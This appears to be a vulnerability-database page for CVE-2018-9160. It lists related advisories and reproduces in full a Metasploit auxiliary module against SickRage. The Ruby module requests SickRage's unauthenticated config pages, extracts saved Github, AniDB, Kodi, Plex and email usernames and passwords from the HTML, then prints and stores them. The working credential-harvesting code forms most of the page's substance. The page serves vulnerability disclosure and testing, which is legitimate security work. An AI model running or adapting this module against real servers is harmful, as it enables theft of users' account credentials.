Lucene search
K

HTTP SickRage Password Leak

🗓️ 22 Jun 2018 16:18:02Reported by Sven Fassbender, Shelby PaceType 
metasploit
 metasploit
🔗 www.rapid7.com👁 34 Views

HTTP SickRage Password Leak allows viewing of user's Github credentials in HTTP responses. SickRage does not require login info by default

Related
Code
ReporterTitlePublishedViews
Family
0day.today
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response Exploit
26 Apr 201800:00
zdt
ATTACKERKB
CVE-2018-9160
31 Mar 201821:29
attackerkb
Circl
CVE-2018-9160
25 Jun 201822:31
circl
CNVD
SickRage Information Disclosure Vulnerability
2 Apr 201800:00
cnvd
CVE
CVE-2018-9160
31 Mar 201821:00
cve
Cvelist
CVE-2018-9160
31 Mar 201821:00
cvelist
Exploit DB
SickRage &lt; v2018.03.09 - Clear-Text Credentials HTTP Response
26 Apr 201800:00
exploitdb
exploitpack
SickRage v2018.03.09 - Clear-Text Credentials HTTP Response
26 Apr 201800:00
exploitpack
Github Security Blog
SiCKRAGE Discloses Plaintext Credentials
13 May 202201:53
github
NVD
CVE-2018-9160
31 Mar 201821:29
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HTTP SickRage Password Leak',
      'Description'    => %q{
        SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP
        responses unless the user has set login information for SickRage.

        By default, SickRage does not require login information for the installation.
      },
      'Author'         =>
      [
        'Sven Fassbender', # EDB POC
        'Shelby Pace'     # Metasploit Module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2018-9160'],
          ['EDB', '44545']
        ],
      'DisclosureDate' => '2018-03-08'
    ))

    register_options(
    [
      OptString.new('TARGETURI', [true, 'Optional path that gets prepended to the default paths to be searched', '/']),
      Opt::RPORT(8081)
    ])
  end

  def get_config(path)
    uri = normalize_uri(target_uri.path, path)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )

    # Improve this later: Add a loginscanner.
    if res && res.headers['Location'] =~ /^\/login\//
      raise RuntimeError, 'SickRage is protected with authentication'
    end

    unless res && res.code == 200
      print_error("Unable to reach #{uri}")
      return
    end

    res.get_html_document
  end

  def is_valid?(user, pass)
    !(user.empty? || ['None', 'hidden_value'].include?(pass))
  end

  def save_creds(app, user, pass)
    print_good("#{app} username: #{user}")
    print_good("#{app} password: #{pass}")
    store_valid_credential(user: user, private: pass)
  end

  def get_creds(path, config)
    return if config.at("input[@id=\"#{path}_username\"]").nil?

    username = config.at("input[@id=\"#{path}_username\"]").attribute('value').to_s
    password = config.at("input[@id=\"#{path}_password\"]").attribute('value').to_s

    if is_valid?(username, password)
      save_creds(path, username, password)
    end
  end

  def get_notification_creds(config)
    return if config.at('input[@id="email_host"]').nil?

    hostname = config.at('input[@id="email_host"]').attribute('value').to_s
    email_user = config.at('input[@id="email_user"]').attribute('value').to_s
    email_pass = config.at('input[@id="email_password"]').attribute('value').to_s

    if is_valid?(email_user, email_pass)
      save_creds("Email", "#{email_user}@#{hostname}", email_pass)
    end
  end

  def run
    begin
      paths = ['/config/general/', '/config/anime/', '/config/notifications/']
      paths.each do |path|
        config = get_config(path)
        next if config.nil?

        if path.split('/').last.eql?('notifications')
          get_notification_creds(config)
        end

        ['git', 'anidb', 'kodi', 'plex_server', 'plex_client'].each do |path|
          get_creds(path, config)
        end
      end
    rescue RuntimeError => e
      print_error(e.message)
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 25
CVSS 39.8
EPSS0.76519
34